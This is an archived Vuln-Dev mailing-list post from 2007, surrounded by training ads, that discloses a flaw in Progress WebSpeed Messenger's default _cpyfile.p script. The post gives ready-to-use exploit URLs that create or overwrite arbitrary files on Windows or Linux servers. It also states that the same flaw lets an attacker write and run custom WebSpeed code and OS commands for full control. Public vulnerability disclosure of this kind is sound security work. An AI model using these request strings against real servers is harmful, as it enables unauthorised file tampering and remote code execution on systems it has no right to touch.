Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Vuln-Dev
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

Progress Webspeed exploit for all releases

from [suresync] Network Security [Permanent Link]
Subject: Progress Webspeed exploit for all releases
Date: 24 Apr 2007 18:46:35 -0000 
Because of a flaw in _cpyfile.p which is a default installed file it is 
possible to gain full control of a machine running Progress Webspeed Messenger. 
 You can access, change and edit allmost any file on the server running the 
Webspeed Messenger even when the workshop is disabled.

First you have to find the messenger execution url. For example:
http://yourmachine.com/scripts/cgiip.exe/WService=wsbroker1
http://yourmachine.com/scripts/wsisa.dll/WService=wsbroker1

just add the following to the url:
/webutil/_cpyfile.p?options=save,editor&tempFile=dummy.tmp&fileName=C:/root.txt&action=last&section=1&txt0=Test

your url will look like this:
http://yourmachine.com/scripts/cgiip.exe/WService=wsbroker1/webutil/_cpyfile.p?options=save,editor&tempFile=dummy.tmp&fileName=C:/root.txt&action=last&section=1&txt0=Test

When you execute this, the script will generate a file c:/root.txt which 
contains the text Test.
For a Linux host just change the filename=C:/root.txt into 
filename=/tmp/root.txt

_cpyfile.p replaces the file if it allready exist. This is just a simple 
example to create a file root.txt with the text test in it. But it is also 
possible to write your own webspeed code and execute it. And webspeed supports 
OS-Commands so there are multiple ways of exploiting this flaw If tried this on 
webspeed 3.1a , 3.1d and 3.1e everytime it worked.
[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • Progress Webspeed exploit for all releases, suresync <=
Previous by Date:  [security bulletin] HPSBST02200 SSRT071330 rev.1 - HP StorageWorks Command View Advanced Edition for XP, Local Unauthorized Access, security-alert
Next by Date:  [MajorSecurity Advisory #46]Plogger - Session fixation Issue, admin
Previous by Thread:  [security bulletin] HPSBST02200 SSRT071330 rev.1 - HP StorageWorks Command View Advanced Edition for XP, Local Unauthorized Access, security-alert
Next by Thread:  [MajorSecurity Advisory #46]Plogger - Session fixation Issue, admin
Indexes:  [Date] [Thread] [Top] [All Lists]